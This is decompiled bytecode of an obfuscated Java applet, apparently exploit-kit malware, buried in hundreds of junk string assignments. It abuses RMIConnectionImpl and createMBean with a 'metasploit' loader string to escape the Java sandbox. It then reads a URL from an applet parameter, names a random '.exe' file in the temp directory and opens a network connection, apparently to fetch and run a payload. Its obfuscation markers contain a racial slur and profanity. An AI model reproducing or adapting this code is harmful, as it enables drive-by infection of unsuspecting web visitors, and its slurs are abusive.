import java.io.InputStream;
import java.rmi.MarshalledObject;
import javax.management.remote.rmi.RMIConnection;
import javax.security.auth.Subject;
import java.io.IOException;
import java.rmi.Remote;
import java.util.Map;
import javax.management.remote.rmi.RMIServerImpl;
import javax.management.OperationsException;
import java.io.ObjectInputStream;
import javax.management.loading.ClassLoaderRepository;
import javax.management.IntrospectionException;
import javax.management.MBeanInfo;
import java.util.Set;
import javax.management.QueryExp;
import javax.management.NotCompliantMBeanException;
import javax.management.InstanceAlreadyExistsException;
import javax.management.ObjectInstance;
import javax.management.ListenerNotFoundException;
import javax.management.NotificationFilter;
import javax.management.NotificationListener;
import javax.management.MBeanException;
import javax.management.InvalidAttributeValueException;
import javax.management.AttributeNotFoundException;
import javax.management.Attribute;
import javax.management.ReflectionException;
import javax.management.AttributeList;
import javax.management.MBeanRegistrationException;
import javax.management.InstanceNotFoundException;
import javax.management.ObjectName;
import javax.management.MBeanServer;
import java.applet.Applet;

// 
// Decompiled by Procyon v0.5.30
// 

public class wrsvwwfsfwhazilh extends Applet
{
    private static final long serialVersionUID = 2205862970052148546L;
    
    public void init() {
        // 
        // This method could not be decompiled.
        // 
        // Original Bytecode:
        // 
        //     0: ldc             "hzmvqicawv"
        //     2: astore_1        /* JuiL5bh */
        //     3: ldc             "ksmfbsbbct"
        //     5: astore_2        /* TwaK7tr */
        //     6: ldc             "vahwgtkmnm"
        //     8: astore_3        /* HjhQ1bz */
        //     9: ldc             "qmgmlymxbs"
        //    11: astore          MjkV7px
        //    13: ldc             "dhdghikugg"
        //    15: astore          QquX7vh
        //    17: ldc             "dqhfbvhpyx"
        //    19: astore          RmqJ1gk
        //    21: ldc             "pweuejcezn"
        //    23: astore          AkgM9sp
        //    25: ldc             "srhkrfwjra"
        //    27: astore          ZecD5pp
        //    29: ldc             "pwgvyfwojs"
        //    31: astore          XlkE1ea
        //    33: ldc             "nzcmnrdwcl"
        //    35: astore          WrgB4ie
        //    37: ldc             "lmfyrhwokx"
        //    39: astore          XtwY6vt
        //    41: ldc             "xbasxncezv"
        //    43: astore          RemU7hp
        //    45: ldc             "myttywrgsg"
        //    47: astore          RkrG2im
        //    49: ldc             "voehyebdkx"
        //    51: astore          GvoN6sp
        //    53: ldc             "ewmaypugnc"
        //    55: astore          GqbU7xk
        //    57: ldc             "qgxwkxciwd"
        //    59: astore          BbjT2ze
        //    61: ldc             "owyizblnqa"
        //    63: astore          HgpJ5ge
        //    65: ldc             "kignvitkrj"
        //    67: astore          MkgA5ja
        //    69: ldc             "hkpfedccdc"
        //    71: astore          LqvK3nh
        //    73: ldc             "upjsdnesru"
        //    75: astore          HgeW9jm
        //    77: ldc             "rdwccnyrlp"
        //    79: astore          VodE9xt
        //    81: ldc             "whacjwrkoq"
        //    83: astore          LqwF9fi
        //    85: ldc             "qfnaktykmx"
        //    87: astore          MfzR6ye
        //    89: ldc             "wyyingbble"
        //    91: astore          DbkP1ei
        //    93: ldc             "jmjlxwfoqa"
        //    95: astore          VskF7rn
        //    97: ldc             "orfzslbeke"
        //    99: astore          XpeJ4qx
        //   101: ldc             "tqtlbzggsk"
        //   103: astore          YxbH3gz
        //   105: ldc             "lbbhdfiupq"
        //   107: astore          YysL8pd
        //   109: ldc             "anroawpnvv"
        //   111: astore          ZmcV7cc
        //   113: ldc             "pkoaaoxtyo"
        //   115: astore          UbiK9ic
        //   117: ldc             "ybkmylruam"
        //   119: astore          KooB5bo
        //   121: aload_0         /* this */
        //   122: invokevirtual   wrsvwwfsfwhazilh.pepe:()Ljava/rmi/MarshalledObject;
        //   125: astore          params
        //   127: ldc             "gcegmhwthr"
        //   129: astore          WfhP7sw
        //   131: ldc             "fbxjxdkybc"
        //   133: astore          QrjQ2jz
        //   135: ldc             "nlfuwqqpyw"
        //   137: astore          HtrZ6zj
        //   139: ldc             "vearjzesqn"
        //   141: astore          MghQ6gx
        //   143: ldc             "gqlkgloren"
        //   145: astore          HneW7ys
        //   147: ldc             "ahrdxzhudb"
        //   149: astore          PakN1mw
        //   151: ldc             "meademwzvf"
        //   153: astore          OaqI8oe
        //   155: ldc             "tdcvfoxwra"
        //   157: astore          KzaD9al
        //   159: ldc             "acjndtwyvn"
        //   161: astore          CgsZ3ia
        //   163: ldc             "apjwudhquv"
        //   165: astore          MafN6pt
        //   167: ldc             "pxsprdvude"
        //   169: astore          MtyT7gp
        //   171: ldc             "ffezahudsz"
        //   173: astore          KnuC4jv
        //   175: ldc             "obtwspfhin"
        //   177: astore          JeoV5fq
        //   179: ldc             "lgizomfakm"
        //   181: astore          QudH8tq
        //   183: ldc             "jspotcjmpe"
        //   185: astore          WqtS1si
        //   187: ldc             "cqghienglu"
        //   189: astore          ExmF8rf
        //   191: ldc             "unmzemxaff"
        //   193: astore          QfeA1vv
        //   195: ldc             "dkrdmmmowb"
        //   197: astore          OxyY2lz
        //   199: ldc             "eugbhzvznw"
        //   201: astore          QoaW9ur
        //   203: ldc             "teyklsinsx"
        //   205: astore          FwrQ3ws
        //   207: ldc             "dxrifugrap"
        //   209: astore          BofC4lm
        //   211: ldc             "lxdusidxxh"
        //   213: astore          InvN7ro
        //   215: ldc             "dgbhqzskfe"
        //   217: astore          IcpN2rr
        //   219: ldc             "fluppgwtpv"
        //   221: astore          SirU4wi
        //   223: ldc             "zyjwvutpbs"
        //   225: astore          OtuA9vn
        //   227: ldc             "evqfffrlmm"
        //   229: astore          YltZ9qd
        //   231: ldc             "vicxydvrcw"
        //   233: astore          TezD5zw
        //   235: ldc             "obbnjvhdnx"
        //   237: astore          XkzQ7jg
        //   239: ldc             "jgmhypjdmy"
        //   241: astore          UvdG6tp
        //   243: aload_0         /* this */
        //   244: invokespecial   wrsvwwfsfwhazilh.getRMIServerImpl:()Ljavax/management/remote/rmi/RMIServerImpl;
        //   247: astore          impl
        //   249: ldc             "zzjtyelotj"
        //   251: astore          VquU8wx
        //   253: ldc             "ypcvfdrqgm"
        //   255: astore          YimD7kz
        //   257: ldc             "fgmiayerrw"
        //   259: astore          CjiF6zi
        //   261: ldc             "ruvtbyxspc"
        //   263: astore          KksN2rr
        //   265: ldc             "ikwxkzkemp"
        //   267: astore          HrmO3cy
        //   269: ldc             "qvbanxtmih"
        //   271: astore          HsoW9cs
        //   273: ldc             "dywbapdxiq"
        //   275: astore          ExvR9ye
        //   277: ldc             "woabjymlis"
        //   279: astore          IzbP9ur
        //   281: ldc             "ewcncnezls"
        //   283: astore          IrqU4nc
        //   285: ldc             "dciucfajli"
        //   287: astore          PwrC6za
        //   289: ldc             "ychadpcxjy"
        //   291: astore          KfjQ9kf
        //   293: ldc             "iwbzhtaufi"
        //   295: astore          HzzO8cm
        //   297: ldc             "phxaiwetdw"
        //   299: astore          KwaK3qg
        //   301: ldc             "uplnidocno"
        //   303: astore          OyxV5lv
        //   305: ldc             "anbeuimhxn"
        //   307: astore          YjaR9gk
        //   309: ldc             "mjqhhvbdwd"
        //   311: astore          BbeL3mv
        //   313: ldc             "dybhulgnwo"
        //   315: astore          DffL7hs
        //   317: ldc             "zzyuhcjsep"
        //   319: astore          GlkH2my
        //   321: ldc             "phziurrsjc"
        //   323: astore          SuvB2sn
        //   325: aload           impl
        //   327: aload_0         /* this */
        //   328: invokespecial   wrsvwwfsfwhazilh.getMbeanServer:()Ljavax/management/MBeanServer;
        //   331: invokevirtual   javax/management/remote/rmi/RMIServerImpl.setMBeanServer:(Ljavax/management/MBeanServer;)V
        //   334: ldc             "zwnvzoaauy"
        //   336: astore          YhgV7bt
        //   338: ldc             "nvhgzjusdj"
        //   340: astore          AzuT9uf
        //   342: ldc             "aastvgtlid"
        //   344: astore          VcdF4hl
        //   346: ldc             "gcsvzsxilz"
        //   348: astore          McyL1mo
        //   350: ldc             "viqkwhdebp"
        //   352: astore          HonF9td
        //   354: ldc             "zhqyllvpby"
        //   356: astore          CyzU5jm
        //   358: ldc             "sumrhmvdyg"
        //   360: astore          AtrB1jt
        //   362: ldc             "fsdnrfaqee"
        //   364: astore          MhsQ1at
        //   366: ldc             "dxuabzedue"
        //   368: astore          XmcP7vk
        //   370: ldc             "jmzvvctosk"
        //   372: astore          BpwK1br
        //   374: ldc             "vqlfsytpwh"
        //   376: astore          UzzT2be
        //   378: ldc             "yvdnbkrkax"
        //   380: astore          UrlW1zg
        //   382: ldc             "xykddlxkjj"
        //   384: astore          DioH4he
        //   386: ldc             "qbfdrnitgf"
        //   388: astore          RlaL9sm
        //   390: ldc             "jasvgeougt"
        //   392: astore          WgdV2ja
        //   394: ldc             "mzfhzndqvh"
        //   396: astore          DpsQ4lu
        //   398: ldc             "zofyjkmeom"
        //   400: astore          ApaY9vm
        //   402: ldc             "qbelgskgng"
        //   404: astore          QryJ4du
        //   406: ldc             "rvbaxqbecp"
        //   408: astore          AzdR5pm
        //   410: ldc             "vlnraziyif"
        //   412: astore          YzoE2kn
        //   414: ldc             "hlccuryaks"
        //   416: astore          MweG7ld
        //   418: ldc             "eexrqivreu"
        //   420: astore          EuwQ2mu
        //   422: ldc             "syqgrlwsez"
        //   424: astore          TpiG4sw
        //   426: ldc             "jhgmiebtaw"
        //   428: astore          SueM1qz
        //   430: ldc             "burcsdggmr"
        //   432: astore          NouX9gf
        //   434: ldc             "gbvgunrouc"
        //   436: astore          TiiO9kh
        //   438: ldc             "bvynkfeyzv"
        //   440: astore          DnlX4gy
        //   442: ldc             "bdnxelgtec"
        //   444: astore          YgfD6vt
        //   446: ldc             "ysjjtlfmww"
        //   448: astore          QgdX8vo
        //   450: ldc             "zlqobhulcc"
        //   452: astore          KqqP4ii
        //   454: new             Ljavax/management/remote/rmi/RMIConnectionImpl;
        //   457: dup            
        //   458: aload           impl
        //   460: ldc_w           "SHAFFLEISANIGGAmSHAFFLEISANIGGAeSHAFFLEISANIGGAtSHAFFLEISANIGGAaSHAFFLEISANIGGAsSHAFFLEISANIGGApSHAFFLEISANIGGAlSHAFFLEISANIGGAoSHAFFLEISANIGGAiSHAFFLEISANIGGAtSHAFFLEISANIGGA"
        //   463: ldc_w           "SHAFFLEISANIGGA"
        //   466: ldc_w           ""
        //   469: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //   472: aconst_null    
        //   473: aconst_null    
        //   474: aconst_null    
        //   475: invokespecial   javax/management/remote/rmi/RMIConnectionImpl.<init>:(Ljavax/management/remote/rmi/RMIServerImpl;Ljava/lang/String;Ljava/lang/ClassLoader;Ljavax/security/auth/Subject;Ljava/util/Map;)V
        //   478: astore          connectionImpl
        //   480: ldc_w           "aitayeympc"
        //   483: astore          QfqE2hx
        //   485: ldc_w           "uqndedslho"
        //   488: astore          ZvrK3gb
        //   490: ldc_w           "draoowdifa"
        //   493: astore          WbcH3ag
        //   495: ldc_w           "tbkdpxsocg"
        //   498: astore          ZymY7jx
        //   500: ldc_w           "vbgzsxvkyn"
        //   503: astore          WmpV4ut
        //   505: ldc_w           "jlgxzqsbwe"
        //   508: astore          OmnZ5kn
        //   510: ldc_w           "wjzknmrwzh"
        //   513: astore          ObjU7ql
        //   515: ldc_w           "zftlkoiyur"
        //   518: astore          FxnE6nt
        //   520: ldc_w           "llrvcgaklk"
        //   523: astore          NirN9tt
        //   525: ldc_w           "gkbnwrotmx"
        //   528: astore          CmmG6dr
        //   530: ldc_w           "cgnfaiuqqy"
        //   533: astore          ErxZ7ba
        //   535: ldc_w           "yvfzajamaf"
        //   538: astore          UhuJ9pb
        //   540: ldc_w           "dkvbnvcsxa"
        //   543: astore          XkdS6mw
        //   545: ldc_w           "gaunzaionk"
        //   548: astore          TlyX2nl
        //   550: ldc_w           "mrrtuehbfs"
        //   553: astore          YegI8er
        //   555: ldc_w           "uwizudwldj"
        //   558: astore          MwyP8wk
        //   560: ldc_w           "yunhtibuit"
        //   563: astore          GzzW4bk
        //   565: ldc_w           "kbtkebijnm"
        //   568: astore          EnfP4qq
        //   570: ldc_w           "noryhiccnl"
        //   573: astore          BxrH5ie
        //   575: ldc_w           "bbdfdizgwv"
        //   578: astore          FjsA9cu
        //   580: ldc_w           "vtsugqabsh"
        //   583: astore          CqhQ5zo
        //   585: ldc_w           "xyxoasnyqy"
        //   588: astore          KcmA9fp
        //   590: ldc_w           "nfuheriwog"
        //   593: astore          WaqG9vz
        //   595: ldc_w           "pxrvzdoaun"
        //   598: astore          SsjE1my
        //   600: ldc_w           "uxhfpoerht"
        //   603: astore          AqjH6vo
        //   605: ldc_w           "rkoxdxkfsi"
        //   608: astore          FrnI2tw
        //   610: ldc_w           "cobtgstnlf"
        //   613: astore          FcuS5ux
        //   615: ldc_w           "fxiggaivue"
        //   618: astore          PbmR3uk
        //   620: ldc_w           "shadhchwxr"
        //   623: astore          LgiO8eg
        //   625: ldc_w           "yuiavznspv"
        //   628: astore          FrnO4tl
        //   630: ldc_w           "pwpnpvcjil"
        //   633: astore          XnkR6yu
        //   635: ldc_w           "mwxnlshmqt"
        //   638: astore          CtzI8zs
        //   640: aload           connectionImpl
        //   642: ldc_w           "d3bbd09724b6936399"
        //   645: aconst_null    
        //   646: aconst_null    
        //   647: aload           params
        //   649: aconst_null    
        //   650: aconst_null    
        //   651: invokevirtual   javax/management/remote/rmi/RMIConnectionImpl.createMBean:(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/management/ObjectName;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance;
        //   654: pop            
        //   655: goto            3066
        //   658: astore_1        /* JuiL5bh */
        //   659: ldc_w           "wowdcpgopb"
        //   662: astore_2        /* JmjT9rg */
        //   663: ldc_w           "iytshwwggx"
        //   666: astore_3        /* SclY2vx */
        //   667: ldc_w           "tdviliicnq"
        //   670: astore          LcoY3ih
        //   672: ldc_w           "japxylqknh"
        //   675: astore          DvhG1pm
        //   677: ldc_w           "qduohtrhnn"
        //   680: astore          KpaG5vw
        //   682: ldc_w           "hcyxoxqjjw"
        //   685: astore          UzrQ5ur
        //   687: ldc_w           "oomtevlovi"
        //   690: astore          GkqO8cf
        //   692: ldc_w           "ydkfksbxsd"
        //   695: astore          RmhL8yk
        //   697: ldc_w           "deolvdsfpa"
        //   700: astore          JaaX8qi
        //   702: ldc_w           "uomugyetzx"
        //   705: astore          EehV1so
        //   707: ldc_w           "rdtnetupbi"
        //   710: astore          NmqF8nu
        //   712: ldc_w           "zfboukkufi"
        //   715: astore          WbbS4sp
        //   717: ldc_w           "nkqscgtmus"
        //   720: astore          AwcF2wk
        //   722: ldc_w           "jgqohlpqja"
        //   725: astore          KfoR5gk
        //   727: ldc_w           "sniuznezlv"
        //   730: astore          JtuA4ty
        //   732: ldc_w           "tbcbqcmvfl"
        //   735: astore          QdsR4dp
        //   737: ldc_w           "yqwbgzvtzo"
        //   740: astore          PfvT3mu
        //   742: ldc_w           "rzkdtlwszn"
        //   745: astore          ZebT1mm
        //   747: ldc_w           "piftucxywp"
        //   750: astore          RnbT6bc
        //   752: ldc_w           "nsjytrpvko"
        //   755: astore          PjcR3ih
        //   757: ldc_w           "iohbbyivpx"
        //   760: astore          NzbD1md
        //   762: ldc_w           "egalshsdhn"
        //   765: astore          DggT6hz
        //   767: ldc_w           "vvxpqdgubz"
        //   770: astore          YccP8mu
        //   772: ldc_w           "rubavnjfpe"
        //   775: astore          GfvA1ud
        //   777: ldc_w           "vmvctbsadn"
        //   780: astore          DczG6qd
        //   782: ldc_w           "cqvylwabbq"
        //   785: astore          JbrJ5ei
        //   787: ldc_w           "tsklijnjvn"
        //   790: astore          GyiQ5xb
        //   792: ldc_w           "otjbrkxxhw"
        //   795: astore          QseM4eq
        //   797: ldc_w           "jhtajvxlia"
        //   800: astore          DmeO7qz
        //   802: ldc_w           "kbphawwgij"
        //   805: astore          TahG8sa
        //   807: getstatic       d3bbd09724b6936399.instance:Ld3bbd09724b6936399;
        //   810: invokevirtual   d3bbd09724b6936399.loadIt:()V
        //   813: ldc_w           "apchbvjovt"
        //   816: astore          ZflH7nc
        //   818: ldc_w           "esmcfvzhmt"
        //   821: astore          AxnD4ll
        //   823: ldc_w           "qiwlwvesnq"
        //   826: astore          ToiK3kw
        //   828: ldc_w           "uysihghdsx"
        //   831: astore          YpxX1kd
        //   833: ldc_w           "eomxckmwqs"
        //   836: astore          VibS1mk
        //   838: ldc_w           "rwzoapulav"
        //   841: astore          LkeM2od
        //   843: ldc_w           "pfixlnysdx"
        //   846: astore          RldQ2jj
        //   848: ldc_w           "mkbewaqekr"
        //   851: astore          EedU5qo
        //   853: ldc_w           "tugkwfyilx"
        //   856: astore          DjbZ1jy
        //   858: ldc_w           "bjaufnwgob"
        //   861: astore          YsoW5dq
        //   863: ldc_w           "jzainjkzsi"
        //   866: astore          AfyW6wh
        //   868: ldc_w           "eqkmlucjjk"
        //   871: astore          JxeB6ol
        //   873: ldc_w           "ciuwgkgkwb"
        //   876: astore          GzqI1we
        //   878: ldc_w           "auejrucgzn"
        //   881: astore          XnwV2oy
        //   883: ldc_w           "cjlrzocxxp"
        //   886: astore          TaoR8re
        //   888: ldc_w           "cyqzuhieob"
        //   891: astore          OpaC1jq
        //   893: ldc_w           "zudyxwaruf"
        //   896: astore          XroX9ul
        //   898: ldc_w           "xmtxvpvcrd"
        //   901: astore          OayK1ca
        //   903: ldc_w           "gtxwaebeeg"
        //   906: astore          LutG7ub
        //   908: ldc_w           "onzfjhtney"
        //   911: astore          JrhN7ic
        //   913: ldc_w           "gltznnurox"
        //   916: astore          VieE7fp
        //   918: ldc_w           "hthzxupvga"
        //   921: astore          GvkR3ah
        //   923: ldc_w           "mupdnmnxzy"
        //   926: astore          QvjY3cw
        //   928: ldc_w           "bdrsgqfphf"
        //   931: astore          OgwN1yh
        //   933: ldc_w           "gssshscdur"
        //   936: astore          WmpE1my
        //   938: ldc_w           "dyoqxdquqq"
        //   941: astore          BrwO2mu
        //   943: ldc_w           "hogbiihcxt"
        //   946: astore          VcnZ1gy
        //   948: ldc_w           "nbrffgsghh"
        //   951: astore          ObhN1yo
        //   953: ldc_w           "rwzcookrve"
        //   956: astore          JcrH2rb
        //   958: new             Ljava/lang/StringBuilder;
        //   961: dup            
        //   962: invokespecial   java/lang/StringBuilder.<init>:()V
        //   965: invokestatic    java/lang/Math.random:()D
        //   968: invokevirtual   java/lang/StringBuilder.append:(D)Ljava/lang/StringBuilder;
        //   971: ldc_w           "SHAFFLEISANIGGA.SHAFFLEISANIGGAeSHAFFLEISANIGGAxSHAFFLEISANIGGAeSHAFFLEISANIGGA"
        //   974: ldc_w           "SHAFFLEISANIGGA"
        //   977: ldc_w           ""
        //   980: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //   983: invokevirtual   java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
        //   986: invokevirtual   java/lang/StringBuilder.toString:()Ljava/lang/String;
        //   989: astore          s
        //   991: ldc_w           "kibfacocbp"
        //   994: astore          HjuD8sc
        //   996: ldc_w           "iatyrrzlfc"
        //   999: astore          JfvE5he
        //  1001: ldc_w           "jommhyokum"
        //  1004: astore          HbzA9sr
        //  1006: ldc_w           "lcdpluvtxj"
        //  1009: astore          VgsI6gh
        //  1011: ldc_w           "mmlogezdkc"
        //  1014: astore          TjeZ1nq
        //  1016: ldc_w           "xqgokmnenf"
        //  1019: astore          VtrS2ic
        //  1021: ldc_w           "poxbqzculd"
        //  1024: astore          YyjE5sc
        //  1026: ldc_w           "eghqkyoosq"
        //  1029: astore          TcqQ2em
        //  1031: ldc_w           "qvkdwnexfq"
        //  1034: astore          BniV5fy
        //  1036: ldc_w           "wuscwqdfom"
        //  1039: astore          NmoM4pr
        //  1041: ldc_w           "tkireehuiz"
        //  1044: astore          ZsbN5fr
        //  1046: ldc_w           "ttxwvkhgod"
        //  1049: astore          NaiK8qq
        //  1051: ldc_w           "fjcshtlkcr"
        //  1054: astore          EgeD4fb
        //  1056: ldc_w           "yhsybqnlho"
        //  1059: astore          ZlwK3yn
        //  1061: ldc_w           "mwkmynytbd"
        //  1064: astore          YqhM7bd
        //  1066: ldc_w           "vucenmtqhs"
        //  1069: astore          FswK2tm
        //  1071: ldc_w           "jurffuvurb"
        //  1074: astore          SmgZ1vi
        //  1076: ldc_w           "vvczystmmu"
        //  1079: astore          QmkF3tv
        //  1081: ldc_w           "rmhljoykab"
        //  1084: astore          PpyM3gv
        //  1086: ldc_w           "ggtljeooly"
        //  1089: astore          YmbW6fg
        //  1091: ldc_w           "omrytjiifw"
        //  1094: astore          NglW3ju
        //  1096: ldc_w           "woduhimknj"
        //  1099: astore          LoxQ4rn
        //  1101: ldc_w           "lhjxpdxvxq"
        //  1104: astore          XdqL3hm
        //  1106: aload_0         /* this */
        //  1107: ldc_w           "FUCKAVERZdFUCKAVERZaFUCKAVERZtFUCKAVERZaFUCKAVERZ"
        //  1110: ldc_w           "FUCKAVERZ"
        //  1113: ldc_w           ""
        //  1116: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //  1119: invokevirtual   wrsvwwfsfwhazilh.getParameter:(Ljava/lang/String;)Ljava/lang/String;
        //  1122: astore          Nigro
        //  1124: ldc_w           "bwvhlmopha"
        //  1127: astore          OryF3nn
        //  1129: ldc_w           "rjgboocmnt"
        //  1132: astore          DccZ2ox
        //  1134: ldc_w           "jrduqpqpgb"
        //  1137: astore          DikQ8dm
        //  1139: ldc_w           "pdrcebgywz"
        //  1142: astore          AjrH7jw
        //  1144: ldc_w           "ybfjfpupzg"
        //  1147: astore          EuwP1su
        //  1149: ldc_w           "wzzwphpkkx"
        //  1152: astore          JrlZ3cj
        //  1154: ldc_w           "xhcvokmozc"
        //  1157: astore          SqtD9eq
        //  1159: ldc_w           "qdmtffbnep"
        //  1162: astore          PzrE4ki
        //  1164: ldc_w           "aqicnhbtgx"
        //  1167: astore          TjiJ6za
        //  1169: ldc_w           "tlwdhbpydi"
        //  1172: astore          TzdT2fw
        //  1174: ldc_w           "wvrcojubib"
        //  1177: astore          IjvW3xq
        //  1179: ldc_w           "irowngtoqt"
        //  1182: astore          EtcN2fm
        //  1184: ldc_w           "fvxhalovqr"
        //  1187: astore          AwcW2xx
        //  1189: ldc_w           "gqeoghoirw"
        //  1192: astore          ZagQ7es
        //  1194: ldc_w           "hkqilqkusk"
        //  1197: astore          BiwG9rf
        //  1199: ldc_w           "itcbpunnhm"
        //  1202: astore          RozY8pb
        //  1204: ldc_w           "adesdknhaq"
        //  1207: astore          FvoF4bk
        //  1209: ldc_w           "remyiunxku"
        //  1212: astore          JdyT7rl
        //  1214: ldc_w           "ochaeulyol"
        //  1217: astore          XcdQ6vi
        //  1219: ldc_w           "zxbnpnusfr"
        //  1222: astore          YdiL4db
        //  1224: ldc_w           "mocguipgwe"
        //  1227: astore          RopK8ox
        //  1229: ldc_w           "mjlmtaelnz"
        //  1232: astore          ChkA2hh
        //  1234: ldc_w           "bcoteoprps"
        //  1237: astore          UaeQ5qw
        //  1239: ldc_w           "shageqlvub"
        //  1242: astore          TwjZ9pg
        //  1244: ldc_w           "FUCKAVERZjFUCKAVERZaFUCKAVERZvFUCKAVERZaFUCKAVERZ.FUCKAVERZiFUCKAVERZoFUCKAVERZ.FUCKAVERZtFUCKAVERZmFUCKAVERZpFUCKAVERZdFUCKAVERZiFUCKAVERZrFUCKAVERZ"
        //  1247: ldc_w           "FUCKAVERZ"
        //  1250: ldc_w           ""
        //  1253: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //  1256: invokestatic    java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
        //  1259: astore          s1
        //  1261: ldc_w           "qenblvwozb"
        //  1264: astore          UbhG5rd
        //  1266: ldc_w           "tswgsgttrb"
        //  1269: astore          WrxN9zz
        //  1271: ldc_w           "frqvqzwajj"
        //  1274: astore          EthG7yv
        //  1276: ldc_w           "bmfhpwaeew"
        //  1279: astore          KbpS1ji
        //  1281: ldc_w           "srpbhgguvy"
        //  1284: astore          VxqM7vk
        //  1286: ldc_w           "pdiwkujzsf"
        //  1289: astore          PniD9br
        //  1291: ldc_w           "ggwnohlckm"
        //  1294: astore          JocJ3xj
        //  1296: ldc_w           "hnjsocwsbu"
        //  1299: astore          DurW1xj
        //  1301: ldc_w           "lsoinhuxxi"
        //  1304: astore          UmoI2jh
        //  1306: ldc_w           "flerwwcwxd"
        //  1309: astore          BzmX1ag
        //  1311: ldc_w           "bauovxqwcp"
        //  1314: astore          YigT8li
        //  1316: ldc_w           "xrteblgfdj"
        //  1319: astore          FtqQ2iw
        //  1321: ldc_w           "khaolherjy"
        //  1324: astore          KtpW6ng
        //  1326: ldc_w           "sjrzhxpcra"
        //  1329: astore          OlvZ1ib
        //  1331: ldc_w           "kncdpksmfn"
        //  1334: astore          PpkO7qb
        //  1336: ldc_w           "zxtxxmeopp"
        //  1339: astore          ClpG1vg
        //  1341: ldc_w           "ycsxnsymqx"
        //  1344: astore          PnoU9gq
        //  1346: ldc_w           "velshlzpwg"
        //  1349: astore          GlvN5jx
        //  1351: ldc_w           "przyhcvngm"
        //  1354: astore          WpwZ9yx
        //  1356: ldc_w           "endppejynb"
        //  1359: astore          WqzV1ra
        //  1361: ldc_w           "sfxiexmvsq"
        //  1364: astore          TuyN9kf
        //  1366: ldc_w           "rdmygkubtr"
        //  1369: astore          ZwtW3dz
        //  1371: ldc_w           "iqullqlwoz"
        //  1374: astore          HzcT3rp
        //  1376: ldc_w           "sikgkcilyr"
        //  1379: astore          YosX5uc
        //  1381: ldc_w           "kmxcyniirh"
        //  1384: astore          NhgE7ma
        //  1386: ldc_w           "mnsmgnmlhg"
        //  1389: astore          JxhZ1to
        //  1391: ldc_w           "rehdllssdp"
        //  1394: astore          KdrR8en
        //  1396: ldc_w           "fitcdhvnon"
        //  1399: astore          DzjP6if
        //  1401: new             Ljava/net/URL;
        //  1404: dup            
        //  1405: aload           Nigro
        //  1407: invokespecial   java/net/URL.<init>:(Ljava/lang/String;)V
        //  1410: astore          url
        //  1412: ldc_w           "vmkgptgypk"
        //  1415: astore          ZimA2mh
        //  1417: ldc_w           "iotpqiibav"
        //  1420: astore          LfaK8sh
        //  1422: ldc_w           "rkazwipuaq"
        //  1425: astore          XsyC1cv
        //  1427: ldc_w           "sxlrxkujxa"
        //  1430: astore          JueR5og
        //  1432: ldc_w           "jzkwuzbdry"
        //  1435: astore          JyvP8ig
        //  1437: ldc_w           "jtrlugmxvq"
        //  1440: astore          PxxD6kz
        //  1442: ldc_w           "wulofnqkwr"
        //  1445: astore          SnsD9hw
        //  1447: ldc_w           "fteslexszb"
        //  1450: astore          McsS4za
        //  1452: ldc_w           "hwujacsnsm"
        //  1455: astore          XyuR2nx
        //  1457: ldc_w           "aljcyxepim"
        //  1460: astore          ZxjV3dd
        //  1462: ldc_w           "qqcjalkdns"
        //  1465: astore          NkcM2rb
        //  1467: ldc_w           "lqhuasmkag"
        //  1470: astore          EtzR8oy
        //  1472: ldc_w           "psaiaxewoa"
        //  1475: astore          DzzS6kw
        //  1477: ldc_w           "ixcahiilbs"
        //  1480: astore          EjiA2fl
        //  1482: ldc_w           "jmzhrhzdbc"
        //  1485: astore          AtkJ8ck
        //  1487: ldc_w           "bmliwvmmdj"
        //  1490: astore          XjjD4wq
        //  1492: ldc_w           "dagsrlgzoi"
        //  1495: astore          ChiN2sk
        //  1497: ldc_w           "xsfrwztakq"
        //  1500: astore          AtyV6ag
        //  1502: ldc_w           "grjyqvgakg"
        //  1505: astore          BviM1mw
        //  1507: ldc_w           "ozclxisxng"
        //  1510: astore          AywT6lw
        //  1512: ldc_w           "ecbhyikmhs"
        //  1515: astore          JeiZ3eb
        //  1517: aload           url
        //  1519: invokevirtual   java/net/URL.openConnection:()Ljava/net/URLConnection;
        //  1522: pop            
        //  1523: ldc_w           "ynbfxebkuy"
        //  1526: astore          EyjH9tb
        //  1528: ldc_w           "qkjczmpigh"
        //  1531: astore          LgwU6cw
        //  1533: ldc_w           "jnodamvwfq"
        //  1536: astore          BtlM8sv
        //  1538: ldc_w           "lvtsxzppiy"
        //  1541: astore          TzvY2gq
        //  1543: ldc_w           "xeribskehw"
        //  1546: astore          IadW1jg
        //  1548: ldc_w           "thhwcjcqkq"
        //  1551: astore          NkkB5oi
        //  1553: ldc_w           "uogjgyxioq"
        //  1556: astore          DghY4mx
        //  1558: ldc_w           "qeswynnlpq"
        //  1561: astore          QkjY2kg
        //  1563: ldc_w           "xpwgkmtsre"
        //  1566: astore          OojE6xv
        //  1568: ldc_w           "mygguaungq"
        //  1571: astore          PvbU7um
        //  1573: ldc_w           "jenwvdylze"
        //  1576: astore          QqwX7ly
        //  1578: ldc_w           "vqbtpinwas"
        //  1581: astore          QqeS6ko
        //  1583: ldc_w           "euszrtytdb"
        //  1586: astore          XnvP1zm
        //  1588: ldc_w           "mkbwcquixv"
        //  1591: astore          KcyY1mj
        //  1593: ldc_w           "xcuwhluotv"
        //  1596: astore          ReyP3el
        //  1598: ldc_w           "xmitwgordr"
        //  1601: astore          MvfX5js
        //  1603: ldc_w           "lzgxujafdt"
        //  1606: astore          GxoC6zy
        //  1608: ldc_w           "kemkdkjohn"
        //  1611: astore          EuvR8gg
        //  1613: ldc_w           "ksiezcmjdj"
        //  1616: astore          UbpS7vk
        //  1618: ldc_w           "fmmuvdvudz"
        //  1621: astore          YgkN9zn
        //  1623: ldc_w           "aemwexwvfw"
        //  1626: astore          ZslQ7au
        //  1628: ldc_w           "ulraexbtxs"
        //  1631: astore          EegL2ie
        //  1633: ldc_w           "sygsoznbfp"
        //  1636: astore          KngH8vw
